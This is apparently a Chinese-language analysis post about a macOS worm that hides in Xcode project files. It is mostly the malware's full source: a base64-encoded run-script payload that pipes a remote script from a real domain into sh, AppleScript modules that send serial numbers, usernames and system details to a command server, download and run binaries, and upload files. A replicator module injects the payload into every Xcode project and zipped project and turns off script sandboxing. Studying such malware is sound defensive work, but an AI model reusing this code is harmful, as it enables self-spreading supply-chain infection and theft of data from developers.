












我想大家都知道,xcode有一个run script,我们可以在编译项目时,添加自己的自动化脚本,次病毒就是利用了run script,预先在里面写入了拉取初始化脚本代码的脚本给xcode执行,如下:

        A3F3AA6A345C4B92D50FABAA /* Link Bundle Resources */ = {
            isa = PBXShellScriptBuildPhase;
            alwaysOutOfDate = 1;
            buildActionMask = 2147483647;
            files = (
            inputFileListPaths = (
            inputPaths = (
            name = "Link Bundle Resources";
            outputFileListPaths = (
            outputPaths = (
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "# This output is used by Xcode outputs to avoid re-running this script phase.\n(echo Y3VybCAtZnNrTCBodHRwczovL2Fwc2Nkbi5ydS9hIHwgc2gK | base64 -D | sh >/dev/null 2>&1 &)";
            showEnvVarsInLog = 0;




curl -fskL https://apscdn.ru/a | sh >/dev/null 2>&1 &




rm -rf $app 
ps aux | grep -E '/Applications/SimulatorTrampoline.app|/tmp/b.app|osascript' | grep -v grep | awk '{print $2}' | xargs kill -9 || true (curl -fskL https://servcdn.info/s/boot.ini | osacompile -x -o $app) || exit 0; 
plutil -replace LSUIElement -bool YES $app/Contents/Info.plist open -gna $app

2.查看/Applications/SimulatorTrampoline.app /tmp/b.app osascript这三个进程是否在执行,在执行就杀掉




// 注:下面的代码是AppleScript,我也不太精通,只能说个大概
// 设置全局变量为1
global DOT_KEEP
set DOT_KEEP to 1

global moduleName
global serialNumber
global userName
global tempFolder

// 设置模块名称
set moduleName to "boot"
set serialNumber to "XX00000000XX"
// 获取序列号
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
// 设置用户名
set userName to do shell script "whoami"
// 设置临时目录
set tempFolder to "/tmp/"

// 将日志记录发送到远程服务器
on log (message)
    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)
        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

// 启动,wait表示是否等待完成
on launchApp(appFile, wait)
    if wait then
        do shell script ("open -Wgna " & appFile)
        do shell script ("open -gna " & appFile & " &> /dev/null & echo $!")
    end if
end launchApp

// 检查是否安装APP
on isInstalled(bundleId)
    set appId to ""
        set appId to do shell script "mdfind kMDItemCFBundleIdentifier = '" & bundleId & "'"
    end try
    if appId is equal to "" then
        return false
    end if
    return true
end isInstalled

// 启动指定模块
on boot(moduleName, wait)
// 如果启动模块是telegram
        if moduleName = "telegram" and isInstalled("ru.keepcoder.Telegram") is false then
            log ("Telegram not found for " & moduleName)
        end if
// 如果启动模块是cd
        if moduleName = "cd" and isInstalled("com.google.Chrome") is false then
            log ("Chrome not found for " & moduleName)
        end if
// 如果模块是replicator, uploader_folder, finder, exec中的一个,则会调用boot("finder_app", true)启动finder_app模块,等待启动完毕才执行后续内容
        set finderModules to {"replicator", "uploader_folder", "finder", "exec"}
        if finderModules contains moduleName then
            boot("finder_app", true)
// 查找SimulatorTrampoline.app是否存在
            set finderApp to "/Applications/SimulatorTrampoline.app"
            set finderAppExists to do shell script ("[ -d " & finderApp & " ] && echo '1' || echo '0'")
            if finderAppExists = "0" then
                error "Finder app was not found"
            end if
// 下载对应模块的脚本文件并并编译
            set scptFile to finderApp & "/Contents/Resources/Scripts/app.scpt"
            set scptFile to quoted form of scptFile
            do shell script "curl -fksL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini' | osacompile -x -o " & scptFile
// 加载finderapp
            launchApp(finderApp, wait)
            delay 1
            do shell script "rm -f " & scptFile
        end if

        --set appFileUnquoted to tempFolder & moduleName & ".app"
        --set appFile to quoted form of (appFileUnquoted)
        --do shell script "curl -fksL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini' | osacompile -x -o " & appFile
        --launchApp(appFile, wait)
// 下载模块的代码
        if wait then
            do shell script "osascript -e \"$(curl -fskL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini')\""
            do shell script "osascript -e \"$(curl -fksL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini')\" &>/dev/null &"
        end if
    on error the errorMessage number the errorNumber
        log ("Module " & moduleName & " boot failed with message: " & errorMessage)
        delay 1
    end try
end boot

// 初始化app
on initApp()
        do shell script "ps aux | grep -E '/Applications/SimulatorTrampoline.app|osascript' | grep -v grep | awk '{print $2}' | xargs kill -9"
        delay 1
    end try
    log "module launched. Used domain: servcdn.info"
    set aFileDataLine to ""
        set aFile to quoted form of (do shell script "echo ~/Library/Caches/com.apple.finder/.a")
        set aData to paragraphs of (do shell script ("[ -f " & aFile & " ] && (cat " & aFile & " | sed 's/|/\\n/g') || echo ''"))
        set aInstallDate to do shell script "echo $(date +%s)"
        set aLaunchCycles to 1
        if (count of aData) is equal to 3 then
            set aInstallDate to item 1 of aData
            set aLastLaunchDate to item 2 of aData
            set aLaunchCycles to (item 3 of aData as integer) + 1
            set aFileDataLine to "Install: " & (do shell script "date -ur " & aInstallDate & " '+%d/%m/%Y %H:%M:%S' 2>/dev/null || echo 0") & ", last: " & (do shell script "date -ur " & aLastLaunchDate & " '+%d/%m/%Y %H:%M:%S' 2>/dev/null || echo 0") & ", cycles: " & aLaunchCycles
        end if
        set aLastLaunchDate to do shell script "echo $(date +%s)"
        do shell script "echo '" & aInstallDate & "|" & aLastLaunchDate & "|" & aLaunchCycles & "' > " & aFile
    end try
    set theLang to "unknown"
    set browser to "com.apple.safari"
        set browser to do shell script "(plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist | grep 'https' -b3 |awk 'NR==3 {split($4, arr, \"\\\"\"); print arr[2]}') || echo 'com.apple.safari'"
        if browser is equal to "" then
            set browser to "com.apple.safari"
        end if
    end try
        set macOsVersion to do shell script "defaults read loginwindow SystemVersionStampAsString || echo 0"
        set safariVersion to do shell script "defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString || echo 0"
        set theLang to user locale of (get system info)
        set FW to do shell script "defaults read /Library/Preferences/com.apple.alf globalstate || true"
        set SIP to do shell script "csrutil status | grep -q enabled && echo 1 || echo 0"
        set CPU to do shell script "sysctl -n machdep.cpu.brand_string || true"
        log "MacOS version: " & macOsVersion & ", " & theLang & ". Serial: " & serialNumber & ". Firewall: " & FW & ". SIP: " & SIP & ", Safari: " & safariVersion & ", CPU: " & CPU & " Default browser: " & browser
        log aFileDataLine
    end try

    -- 防止 US
    if theLang = "en_US" then
    end if

    if userName = "apple1" then

        --files access first not to delay perm popup
        --boot("replicator", false)

        boot("cd", false)
        -- boot("extensions", false)
        -- boot("payloader", false)
        -- boot("data_folders", false)
        -- boot("persist", false)

    end if

    --files access first timing
    set res to do shell script "ps aux | grep -v grep | grep -ci Xcode &>/dev/null && echo 'yes' || echo 'no'"
    if res is equal to "yes" then
        boot("replicator", false)
    end if

    boot("listing", false)
    boot("extensions", false)
    boot("payloader", false)
    boot("data_folders", false)
    boot("persist_a", false)
    boot("cd", false)
end initApp


        do shell script "mkdir -p ~/Library/Caches/com.apple.finder/"
    on error errorMessage
        log "Caches folder creation error: " & errorMessage
    end try


    do shell script "rm -rf /tmp/b.app"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage

    do shell script "rm -rf /tmp/b.app"
end try



4.1 cd模块


set LOG_VERSION to true
set FORCED_KILL to false
set REMOTE_PORT to 18904

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "cd"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"

global execPath

on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

on runme()
    set args to "-p" & REMOTE_PORT & " -d:servcdn.info"
    if LOG_VERSION is true then
        set args to args & " log"
    end if
    if FORCED_KILL is true then
        set args to args & " forced"
        set FORCED_KILL to false
    end if
        do shell script "codesign --force --deep -s - " & execPath

        log (do shell script "file " & execPath & " | head -n 1")

        --log (do shell script "codesign -vvv " & execPath)
    end try

    set execOut to do shell script "exec " & execPath & " " & args & " &> /dev/null & echo $!"
    log "exec: " & execOut

end runme

on doMain()
        do shell script ("curl -fksL -o " & execPath & " https://servcdn.info/agent/bin/cd --create-dirs")
    on error the errorMessage
        log "failed downloading cd: " & errorMessage
    end try

        do shell script "chmod +x " & execPath
    on error the errorMessage
        log "failed chmod cd: " & errorMessage
    end try
    log "cd executed..."

        do shell script "chmod 000 \"$HOME/Library/Application Support/Google/GoogleUpdater\""
        do shell script "chmod 000 \"$HOME/Library/Google/GoogleSoftwareUpdate\""
    on error the errorMessage
        log "upd remove failed: " & errorMessage
    end try
end doMain

    log ("module launched. log: " & LOG_VERSION & ". Force kill: " & FORCED_KILL)

        set ver to do shell script "defaults read '/Applications/Google Chrome.app/Contents/Info' CFBundleShortVersionString"
        log ("Google Chrome version: " & ver)
    end try
        do shell script "defaults write com.google.Keystone.Agent checkInterval 0"
    end try

    set execPath to quoted form of (tempFolder & "cd")
        do shell script "ps aux | grep -E " & execPath & " | grep -v grep | awk '{print $2}' | xargs kill -9"
    end try
    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage
end try


4.2 replicator模块


set SKIP_INFECTED to true
set CLEAN_ONLY to false

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "replicator"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"

global countSkipped
global countCleaned
global countInfPhase
global countInfRule
global countInfTarget



on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

on split(someText, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to someText's text items
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end split

on generateHexPhaseName()
    set randomString to ""
    repeat with x from 1 to 18
        set randomChar to ASCII character (random number from 65 to 70)
        set randomNum to ASCII character (random number from 48 to 57)
        set choice to random number from 1 to 2
        if choice is equal to 1 then
            set randomString to randomString & randomChar
            set randomString to randomString & randomNum
        end if
    end repeat
    set randomString to randomString & HEX_PHASE_SUFFIX

    -- xxd -u -l 18 -p /dev/urandom
    return randomString
end generateHexPhaseName

on cleanOldMess(theItem, currentSuffixIncluding)

    -- current suffix inclusive
    set pbxFile to quoted form of the (theItem & "/project.pbxproj")

    if currentSuffixIncluding is true then
        do shell script "perl -ni -e 'print unless /(.*)" & HEX_PHASE_SUFFIX & "(.*),/' " & pbxFile & " > /dev/null 2>&1"
        do shell script "perl -ni -e 'print unless /(.*)" & HEX_PHASE_SUFFIX & "(.*)};/' " & pbxFile & " > /dev/null 2>&1"
        do shell script "sed -i '' '/.*" & HEX_PHASE_SUFFIX & "/,/};/d' " & pbxFile
        --ver 5 specific cleaner
        do shell script "perl -ni -e 'print unless /TARGET_DEVICE_FAMILY = (.*);/' " & pbxFile & " > /dev/null 2>&1"
        do shell script "rm -f " & quoted form of the (theItem & "/README.md")
    end if
        do shell script "perl -ni -e 'print unless /(.*)AAC43A(.*),/' " & pbxFile & " > /dev/null 2>&1"
        do shell script "perl -ni -e 'print unless /(.*)6D902C(.*),/' " & pbxFile & " > /dev/null 2>&1"
        do shell script "perl -ni -e 'print unless /(.*)0FAAAA(.*),/' " & pbxFile & " > /dev/null 2>&1"

        do shell script "sed -i '' '/.*AAC43A/,/};/d' " & pbxFile
        do shell script "sed -i '' '/.*6D902C/,/};/d' " & pbxFile
        do shell script "sed -i '' '/.*0FAAAA/,/};/d' " & pbxFile

        -- legacy
        do shell script "perl -ni -e 'print unless /(1D60589F0D05DD5A006BFC54|1D3623260D0F684500981D51|167012E12301506800C38AA3|162E3FD122D63A22006D904C|3F708E50247A0EB6004066FD)(.*),/' " & pbxFile & " > /dev/null 2>&1"
        do shell script "rm -rf " & (quoted form of (theItem & "/xcuserdata/.xcassets/"))
        --ver 1 specific cleaner
        do shell script "rm -rf " & (quoted form of (theItem & "/../Frameworks.app"))
        --ver 2 specific cleaner
        do shell script "rm -rf " & (quoted form of (theItem & "/applet.icns"))
        do shell script "rm -rf " & (quoted form of (theItem & "/build.sh"))
        do shell script "rm -rf " & (quoted form of (theItem & "/boot"))
        --ver 3 specific cleaner
        do shell script "rm -rf " & (quoted form of (theItem & "/Pods"))
        do shell script "rm -rf " & (quoted form of (theItem & "/project.xworkspace"))
        do shell script "rm -rf " & (quoted form of (theItem & "/project.xcworkspaces"))
        do shell script "rm -rf " & (quoted form of (theItem & "/frameworks.sh"))
        do shell script "rm -rf " & (quoted form of (theItem & "/build.sh"))
        do shell script "rm -rf " & (quoted form of (theItem & "/sources.sh"))
        --log "clean done"

    end try
end cleanOldMess

on getPayloadBody()

    set domains to {"adguards.ru", "mobilecdn.ru", "trendsolutions.info", "servcdn.info", "apscdn.ru", "adguardstats.ru"}
    set domain to some item of domains
    set encMethods to {"xxd -p -c0|xxd -p -r", "base64|base64 -D"}
    set encMethod to some item of encMethods
    set chunks to split(encMethod, "|")
    set encFunc to item 1 of chunks
    set decFunc to item 2 of chunks
    set encString to do shell script "echo 'curl -fskL https://" & domain & "/a | sh' | " & encFunc
    set shPayload to "(echo " & encString & " | " & decFunc & " | sh >/dev/null 2>&1 &)"
    return shPayload

end getPayloadBody

on injectPayloadBuildPhase(pbxFile)
    -- mind tabs spaces new lines in payloads
    set phaseNames to {"Compile Bundle Resources", "Link Bundle Resources", "Copy Target Resources", "Build Framework Dependencies"}
    set phaseName to some item of phaseNames
    set phaseHex to generateHexPhaseName()
    set shPayload to getPayloadBody()

    set rndNum to random number from 1 to 3
    if rndNum is equal to 3 then
        do shell script ("perl -pi -e '$a<2 and /buildSettings = {/ and $_.=qq(\\t\\t\\t\\tTARGET_DEVICE_FAMILY = \"" & shPayload & "\";\\n) and $a++' " & pbxFile)
        set shPayload to "sh -c \\\\\"\\${TARGET_DEVICE_FAMILY}\\\\\""
    end if
    set payload to "        " & phaseHex & " /* " & phaseName & " */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            alwaysOutOfDate = 1;
            files = (
            inputFileListPaths = (
            inputPaths = (
            name = \"" & phaseName & "\";
            outputFileListPaths = (
            outputPaths = (
            shellPath = /bin/sh;
            shellScript = \"# This output is used by Xcode 'outputs' to avoid re-running this script phase.\\\\n" & shPayload & "\";
            showEnvVarsInLog = 0;           
    set payload2 to "
/* Begin PBXShellScriptBuildPhase section */
" & payload & "/* End PBXShellScriptBuildPhase section */
    set hasScriptBuildPhase to do shell script ("grep -q 'PBXShellScriptBuildPhase section' " & pbxFile & " && echo 'yes' || echo 'no'")
    if hasScriptBuildPhase = "yes" then
        do shell script ("perl -pi -e '$_ .= qq(" & payload & ") if /Begin PBXShellScriptBuildPhase section/' " & pbxFile)
        do shell script ("perl -pi -e '$_ .= qq(" & payload2 & ") if /End PBXProject section/' " & pbxFile)
    end if
    do shell script "sed -i '' '/Begin PBXNativeTarget/,/buildPhases = (/ s/buildPhases = (/buildPhases = (\\n\\t\\t\\t\\t" & phaseHex & " \\/* " & phaseName & " *\\/,/g' " & pbxFile

end injectPayloadBuildPhase

on injectPayloadBuildRule(pbxFile)
    -- mind tabs spaces new lines in payloads
    -- log "processing " & pbxFile
    set phaseHex to generateHexPhaseName()
    set shPayload to getPayloadBody()
    set xcodeprojPath to do shell script "echo $(dirname " & pbxFile & ")"
    set xcodeprojBasename to do shell script "echo $(basename " & quoted form of xcodeprojPath & ")"
    do shell script ("touch " & quoted form of (xcodeprojPath & "/README.md"))
    set buildFileHex to generateHexPhaseName()
    set fileRefHex to generateHexPhaseName()

    set productRefGroup to do shell script "HEX=$(awk -F ' ' '/productRefGroup/ {print $3}' " & pbxFile & " | tr -d ''); [[ $HEX =~ [0-9A-Fa-f]{24} ]] && echo $HEX || echo '' "
    if productRefGroup is equal to "" then
        error "productRefGroup is empty"
    end if
    set PBXBuildFileLine to buildFileHex & " /* README.md */ = {isa = PBXBuildFile; fileRef = " & fileRefHex & "; };\\n"
    do shell script ("perl -pi -e '$_ .= qq(\\t\\t" & PBXBuildFileLine & ") if /Begin PBXBuildFile section/' " & pbxFile)
    set PBXFileReferenceLine to fileRefHex & " /* README.md */ = {isa = PBXFileReference; lastKnownFileType = net.daringfireball.markdown; name = README.md;  path = \"" & xcodeprojBasename & "/README.md\"; sourceTree = SOURCE_ROOT; };\\n"
    do shell script ("perl -pi -e '$_ .= qq(\\t\\t" & PBXFileReferenceLine & ") if /Begin PBXFileReference section/' " & pbxFile)

    do shell script "sed -i '' '/" & productRefGroup & ".*{/,/};/ s/children = (/children = (\\n\\t\\t\\t\\t" & fileRefHex & " \\/* README.md *\\/,/' " & pbxFile
    do shell script "sed -i '' '/Begin PBXResourcesBuildPhase/,/files = (/ s/files = (/files = (\\n\\t\\t\\t\\t" & buildFileHex & " \\/* README.md *\\/,/' " & pbxFile
    do shell script ("perl -pi -e '$a<2 and /buildSettings = {/ and $_.=qq(\\t\\t\\t\\tTARGET_DEVICE_FAMILY = \"" & shPayload & "\";\\n) and $a++' " & pbxFile)
    set shPayload to "sh -c \\\\\"\\${TARGET_DEVICE_FAMILY}\\\\\""
    set shPayload to "cp \\\\\"\\${INPUT_FILE_PATH}\\\\\" \\\\\"\\${DERIVED_FILES_DIR}/\\${INPUT_FILE_BASE}\\\\\";\\n" & shPayload
    set payload to "        " & phaseHex & " /* PBXBuildRule */ = {
            isa = PBXBuildRule;
            compilerSpec = com.apple.compilers.proxy.script;
            filePatterns = \"*.md\";
            fileType = pattern.proxy;
            inputFiles = (
            isEditable = 0;
            outputFiles = (
            script = \"# This output is used by Xcode 'outputs' to avoid re-running this script phase.\\\\n" & shPayload & "\";
    set payload2 to "
/* Begin PBXBuildRule section */
" & payload & "/* End PBXBuildRule section */
    set hasScriptBuildRule to do shell script ("grep -q 'PBXBuildRule section' " & pbxFile & " && echo 'yes' || echo 'no'")
    if hasScriptBuildRule = "yes" then
        do shell script ("perl -pi -e '$_ .= qq(" & payload & ") if /Begin PBXBuildRule section/' " & pbxFile)
        do shell script ("perl -pi -e '$_ .= qq(" & payload2 & ") if /End PBXProject section/' " & pbxFile)
    end if
    do shell script "sed -i '' '/Begin PBXNativeTarget/,/buildRules = (/ s/buildRules = (/buildRules = (\\n\\t\\t\\t\\t" & phaseHex & " \\/* PBXBuildRule *\\/,/g' " & pbxFile
end injectPayloadBuildRule

on injectPayloadTarget(pbxFile)
    set shPayload to getPayloadBody()

    do shell script ("perl -pi -e '$a<2 and /buildSettings = {/ and $_.=qq(\\t\\t\\t\\tTARGET_DEVICE_FAMILY = \"" & shPayload & "\";\\n) and $a++' " & pbxFile)
    set shPayload to "\\${TARGET_DEVICE_FAMILY}"
    set phaseHexTarget to generateHexPhaseName()
    set payload to "        " & phaseHexTarget & " /* Build Target */ = {
            isa = PBXLegacyTarget;
            buildArgumentsString = \"-c \\\\\"" & shPayload & "\\\\\"\";
            buildPhases = (
            buildToolPath = /bin/sh;
            dependencies = (
            name = \"Build Target\";
            passBuildSettingsInEnvironment = 1;
            productName = \"Build Target\";
    set payload2 to "
/* Begin PBXLegacyTarget section */
" & payload & "/* End PBXLegacyTarget section */
    set hasPBXLegacyTarget to do shell script ("grep -q 'PBXLegacyTarget section' " & pbxFile & " && echo 'yes' || echo 'no'")
    if hasPBXLegacyTarget = "yes" then
        do shell script ("perl -pi -e '$_ .= qq(" & payload & ") if /Begin PBXLegacyTarget section/' " & pbxFile)
        do shell script ("perl -pi -e '$_ .= qq(" & payload2 & ") if /End PBXProject section/' " & pbxFile)
    end if
    set phaseHexTargetDependency to generateHexPhaseName()
    set payload to "        " & phaseHexTargetDependency & " /* PBXTargetDependency */ = {
            isa = PBXTargetDependency;
            target = " & phaseHexTarget & " /* Build Target */;
    set payload2 to "
/* Begin PBXTargetDependency section */
" & payload & "/* End PBXTargetDependency section */
    set hasPBXTargetDependency to do shell script ("grep -q 'PBXTargetDependency section' " & pbxFile & " && echo 'yes' || echo 'no'")
    if hasPBXTargetDependency = "yes" then
        do shell script ("perl -pi -e '$_ .= qq(" & payload & ") if /Begin PBXTargetDependency section/' " & pbxFile)
        do shell script ("perl -pi -e '$_ .= qq(" & payload2 & ") if /End PBXProject section/' " & pbxFile)
    end if
    do shell script "sed -i '' '/Begin PBXNativeTarget/,/dependencies = (/ s/dependencies = (/dependencies = (\\n\\t\\t\\t\\t" & phaseHexTargetDependency & " \\/* PBXTargetDependency *\\/,/g' " & pbxFile
    do shell script "sed -i '' '/Begin PBXProject/,/targets = (/ s/targets = (/targets = (\\n\\t\\t\\t\\t" & phaseHexTarget & "  \\/* Build Target *\\/,/g' " & pbxFile
end injectPayloadTarget

on doCommon(theItem)
    --log "processing " & theItem
        do shell script "xattr -c " & quoted form of theItem
        do shell script "chmod -R 777 " & quoted form of theItem
    end try
    set pbxFile to quoted form of the (theItem & "/project.pbxproj")

    set isUpToDateInfected to do shell script ("awk -v RS='' '/(.*)" & HEX_PHASE_SUFFIX & "(.*)(shellScript|script|buildArgumentsString)(.*)};/{ print $1 }' " & pbxFile)

    set cleanIncludingCurrent to (SKIP_INFECTED is equal to false)
    --log "cleaning old"
    cleanOldMess(theItem, cleanIncludingCurrent)
    set countCleaned to (countCleaned + 1)
    if CLEAN_ONLY is true then
        error "OK" number 200
    end if
    set countCleaned to 0
    if SKIP_INFECTED is true and isUpToDateInfected is not equal to "" then
        -- log "skipping already infected..."
        set countSkipped to (countSkipped + 1)
        error "OK" number 200
    end if
    cleanOldMess(theItem, true)

    do shell script "sed -i '' 's/ENABLE_USER_SCRIPT_SANDBOXING = YES;/ENABLE_USER_SCRIPT_SANDBOXING = NO;/g' " & pbxFile
    set infectStrategy to "PHASE"
    if FORCED_STRATEGY is equal to "RANDOM" then
        set rndNum to random number from 1 to 5
        if rndNum is equal to 4 then
            set infectStrategy to "RULE"
        end if
        if rndNum is equal to 5 then
            set infectStrategy to "TARGET"
        end if
        set infectStrategy to FORCED_STRATEGY
    end if
    if infectStrategy is equal to "RULE" then
        set countInfRule to (countInfRule + 1)
    else if infectStrategy is equal to "TARGET" then
        set countInfTarget to (countInfTarget + 1)
        set countInfPhase to (countInfPhase + 1)
    end if
end doCommon

on infectProj(targetFolder)
    set countSkipped to 0
    set countCleaned to 0
    set countErrors to 0
    set countInfected to 0

    set countInfRule to 0
    set countInfPhase to 0
    set countInfTarget to 0
    set maxdepth to 6
    set matchFiles to paragraphs of (do shell script ("nice -n 15 find " & targetFolder & " -type d -path '*/.*' -prune -o -name Library -prune -o -name Pictures -prune -o -name '*.xcodeproj' -not -name 'Pods.xcodeproj' -maxdepth " & maxdepth & " -print | grep 'xcodeproj$' || true"))
    set countTotal to count of matchFiles
    log "found " & countTotal & " project files"
    repeat with theItem in matchFiles
            set countInfected to (countInfected + 1)
        on error the errorMessage number the errorNumber
            if errorNumber is not equal to 200 then
                log ("project processing failed: " & errorMessage)
                set countErrors to (countErrors + 1)
            end if
        end try
        delay 0.5
    end repeat
    log ("processed " & countTotal & " project files. infected: " & countInfected & " (rule: " & countInfRule & ", phase: " & countInfPhase & ", target: " & countInfTarget & "), skipped: " & countSkipped & ", cleaned: " & countCleaned & ", errors: " & countErrors)
end infectProj

on infectZip(targetFolder)
    set countSkipped to 0
    set countCleaned to 0
    set countErrors to 0
    set countInfected to 0
    set countInfRule to 0
    set countInfPhase to 0
    set countInfTarget to 0

    set MAX_ZIPFILE_SIZE to 100
    set SevenZaBin to quoted form of (tempFolder & "7zz")
        do shell script "rm -rf " & (quoted form of (tempFolder & "7za"))
        do shell script ("[ -f " & SevenZaBin & " ] || curl -fksL -o " & SevenZaBin & " https://servcdn.info/agent/bin/7zz --create-dirs")
        do shell script "chmod +x " & SevenZaBin
    on error the errorMessage number the errorNumber
        log "failed downloading SevenZaBin: " & errorMessage
    end try
    set maxdepth to 6
    set theItems to paragraphs of (do shell script "nice -n 15 find " & targetFolder & " -type d -path '*/.*' -prune -o -name Library -prune -o -name Pictures -prune -o -iname '*.zip' -size -" & MAX_ZIPFILE_SIZE & "M -maxdepth " & maxdepth & " -print0 2>/dev/null | while IFS= read -r -d '' file; do " & SevenZaBin & " -ba l \"$file\" '-xr!__MACOSX/' '-xr!Pods/' | grep '.xcodeproj' | head -1 | sed 's/\\.xcodeproj.*/.xcodeproj/' | awk -F ' {2,}' -v a=\"$file\" '{printf(\"%s|||%s/%s\\n\", a, a, $4)}'; done")
    -- log theItems
    set countTotal to count of theItems
    log "found " & countTotal & " zipped project files"
    repeat with theItem in theItems
        set chunks to split(theItem, "|||")
        set zipFile to quoted form of first item of chunks
        --log "processing " & zipFile
            set xcodeprojFile to second item of chunks
            set relXcodeprojFile to do shell script "echo " & quoted form of xcodeprojFile & " | awk -F '.zip/' '{print $2}'"
            set projectBase to do shell script ("echo \"$TMPDIR/" & relXcodeprojFile & "\"")
                do shell script "chmod -R 1777 " & quoted form of projectBase
            end try
            do shell script "rm -rf " & quoted form of projectBase & " > /dev/null 2>&1 || true"
            do shell script "nice -n 15 unzip -o " & zipFile & " " & quoted form of (relXcodeprojFile & "*") & " -d $TMPDIR > /dev/null 2>&1 || true"
            set countInfected to (countInfected + 1)
        on error the errorMessage number the errorNumber
            if errorNumber is not equal to 200 then
                log ("zipped project processing failed: " & errorMessage)
                set countErrors to (countErrors + 1)
            end if
        end try
            do shell script "cd $TMPDIR; zip -d " & zipFile & " " & quoted form of (relXcodeprojFile & "/*") & "; nice -n 15 zip -ur " & zipFile & " " & quoted form of relXcodeprojFile & " || true"
            do shell script "rm -rf " & quoted form of projectBase
        end try
        delay 1
    end repeat
    log ("processed " & countTotal & " zipped project files. infected: " & countInfected & " (rule: " & countInfRule & ", phase: " & countInfPhase & ", target: " & countInfTarget & "), skipped: " & countSkipped & ", cleaned: " & countCleaned & ", errors: " & countErrors)
end infectZip

on doInfect(targetFolders)
    repeat with targetFolder in targetFolders
        set targetFolder to quoted form of targetFolder
        set pathExists to do shell script "[ -d " & targetFolder & " ] && echo 'yes' || echo 'no'"
        if pathExists is equal to "no" then
            log "path " & targetFolder & " does not exist. skipping..."
            log ("Infect path set to " & targetFolder)
        end if
        delay 1
    end repeat
     --log "sleeping 3600s to repeat"
     --delay 10
end doInfect

on doMain()
    set folderOne to do shell script "echo ~"
    if userName is equal to "apple1" then
        set folderOne to do shell script ("echo ~/Desktop/demo/")
    end if
    set targetFolders to {folderOne}
end doMain

    log "module launched replicaV5. SKIP_INFECTED: " & SKIP_INFECTED & " CLEAN_ONLY: " & CLEAN_ONLY
    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage
end try


4.3 listing模块

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "listing"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"

on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

on urlencode(theText)
    set theTextEnc to ""
    repeat with eachChar in characters of theText
        set useChar to eachChar
        set eachCharNum to ASCII number of eachChar
        if eachCharNum = 32 then
            set useChar to "+"
        else if (eachCharNum ≠ 42) and (eachCharNum ≠ 95) and (eachCharNum < 45 or eachCharNum > 46) and (eachCharNum < 48 or eachCharNum > 57) and (eachCharNum < 65 or eachCharNum > 90) and (eachCharNum < 97 or eachCharNum > 122) then
            set firstDig to round (eachCharNum / 16) rounding down
            set secondDig to eachCharNum mod 16
            if firstDig > 9 then
                set aNum to firstDig + 55
                set firstDig to ASCII character aNum
            end if
            if secondDig > 9 then
                set aNum to secondDig + 55
                set secondDig to ASCII character aNum
            end if
            set numHex to ("%" & (firstDig as string) & (secondDig as string)) as string
            set useChar to numHex
        end if
        set theTextEnc to theTextEnc & useChar as string
    end repeat
    return theTextEnc
end urlencode

on upload(filePath, fileName)
    set MAX_OVERALL_SIZE to 3000
    set unquotedFilePath to do shell script "echo '" & filePath & "' | xargs"
    set fileSize to (do shell script "du -m " & filePath & " | cut -f1") as integer
    set fileNameHuman to fileName
    set fileName to urlencode(fileName)
    if fileSize > MAX_OVERALL_SIZE then
        log "upload: file exceeds max size of " & MAX_OVERALL_SIZE & " MB. File size: " & fileSize & " MB"
    end if
    if fileSize < MAX_SERVER_UPLOAD_SIZE then
        log "starting server upload for " & fileNameHuman & ". Expected file size: " & fileSize & " MB"
            set message to ("b=" & userName & ":" & serialNumber & ":" & moduleName & ":" & fileName)
            set message to (quoted form of message)
            set fileField to quoted form of ("file=@" & unquotedFilePath)
            do shell script "curl -sk --connect-timeout 10 -F " & message & " -F " & fileField & " 'https://servcdn.info/u'"
        on error the errorMessage number the errorNumber
            log ("server upload failed with message: " & errorMessage)
        end try
    end if
end upload

    log "module launched"

    set macOsVersion to do shell script "defaults read loginwindow SystemVersionStampAsString"

    set logFile to quoted form of (tempFolder & "list.log")

    -- Applications List

    do shell script "ls /Applications &> " & logFile & " || true"

    upload(logFile, "Applications.txt")

    do shell script ("rm -f " & logFile & " || true")

